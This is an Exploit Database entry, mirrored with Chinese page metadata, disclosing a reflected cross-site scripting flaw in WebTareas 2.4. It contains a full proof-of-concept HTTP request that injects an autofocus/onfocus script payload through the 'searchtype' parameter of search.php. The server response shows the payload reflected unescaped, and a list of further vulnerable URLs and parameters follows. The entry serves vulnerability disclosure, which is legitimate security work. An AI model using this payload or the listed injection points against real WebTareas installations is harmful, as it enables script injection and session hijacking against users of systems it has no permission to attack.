WebTareas 2.4 – Reflected XSS (Unauthorised)

• Exploit Database
• 17 阅读

• 作者： Hubert Wojciechowski
  日期： 2023-03-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51088/

• # Exploit Title: WebTareas 2.4 - Reflected XSS (Unauthorised)
  # Date: 15/10/2022
  # Exploit Author: Hubert Wojciechowski
  # Contact Author: hub.woj12345@gmail.com
  # Vendor Homepage: https://sourceforge.net/projects/webtareas/
  # Software Link: https://sourceforge.net/projects/webtareas/
  # Version: 2.4
  # Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
  
  ## Proof Of Concept 
  -----------------------------------------------------------------------------------------------------------------------
  Param: searchtype
  -----------------------------------------------------------------------------------------------------------------------
  Req
  -----------------------------------------------------------------------------------------------------------------------
  GET /webtareas/general/search.php?searchtype=r4e3a%22%3e%3cinput%20type%3dtext%20autofocus%20onfocus%3dalert(1)%2f%2fvv7vqt317x0&searchfor=zxcv&nosearch=&searchonly=&csrfToken=aa05732647773f33e57175a417789d26e8176474dfc87f4694c62af12c24799461b7c0&searchfor=zxcv&Save=Szukaj HTTP/1.1
  Host: 127.0.0.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: pl,en-US;q=0.7,en;q=0.3
  Accept-Encoding: gzip, deflate
  Origin: http://127.0.0.1
  Connection: close
  Referer: http://127.0.0.1/webtareas/general/search.php?searchtype=simple
  Cookie: webTareasSID=k177423c2af6isukkurfeq0g61; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1
  Upgrade-Insecure-Requests: 1
  Sec-Fetch-Dest: document
  Sec-Fetch-Mode: navigate
  Sec-Fetch-Site: same-origin
  Sec-Fetch-User: ?1
  
  
  -----------------------------------------------------------------------------------------------------------------------
  Res:
  -----------------------------------------------------------------------------------------------------------------------
  HTTP/1.1 200 OK
  Date: Sat, 15 Oct 2022 07:46:31 GMT
  Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
  X-Powered-By: PHP/7.4.30
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  X-XSS-Protection: 1; mode=block
  X-Frame-Options: SAMEORIGIN
  X-Content-Type-Options: nosniff
  Connection: close
  Content-Type: text/html; charset=UTF-8
  Content-Length: 11147
  [...]
  <form accept-charset="UNKNOWN" method="POST" action="../general/search.php?searchtype=r4e3a\"><input type=text autofocus onfocus=alert(1)//vv7vqt317x0&searchfor=zxcv&nosearch=&searchonly=" name="searchForm" enctype="multipart/form-data" onsubmit="tinyMCE.triggerSave();return __default_checkformdata(this)">
  [...]
  
  -----------------------------------------------------------------------------------------------------------------------
  Other vulnerable url and params:
  -----------------------------------------------------------------------------------------------------------------------
  /webtareas/administration/print_layout.php [doc_type]
  /webtareas/general/login.php [logout]
  /webtareas/general/login.php [session]
  /webtareas/general/newnotifications.php [msg]
  /webtareas/general/search.php [searchtype]
  /webtareas/administration/print_layout.php [doc_type]